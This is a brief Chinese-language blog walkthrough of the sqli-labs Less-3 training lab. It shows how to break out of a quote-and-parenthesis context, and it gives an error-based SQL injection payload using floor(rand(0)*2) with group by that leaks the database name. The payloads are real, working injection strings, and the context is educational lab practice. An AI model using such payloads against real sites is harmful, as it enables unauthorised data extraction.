sqli-labs之Less-3讲解(报错型注入-单引号)

1. 按照常规套路,打开网页构造语句:

inde.php?id=1

加上'单引号,报错,如下:
sqli-labs之Less-3讲解(报错型注入-单引号)

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1 

后面有括号,咱给他闭合上,继续构造语句:

index.php?id=1') --+

完美绕过,那么我们接下来就是要搞事情,只需要将你想要执行的SQL语句穿插进--+之前即可,很明显这里有报错信息,那么我们就直接使用报错注入就行啦~
2.爆个数据库

index.php?id=1') union select 1,count(*),concat(0x7e,0x7e,(select database()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.columns group by a --+

sqli-labs之Less-3讲解(报错型注入-单引号)
具体步骤以及语句和此篇文章相同,只是多了后面的--+注释符号而已,不再赘述,如有问题请联系我。

发表评论

电子邮件地址不会被公开。必填项已用 * 标注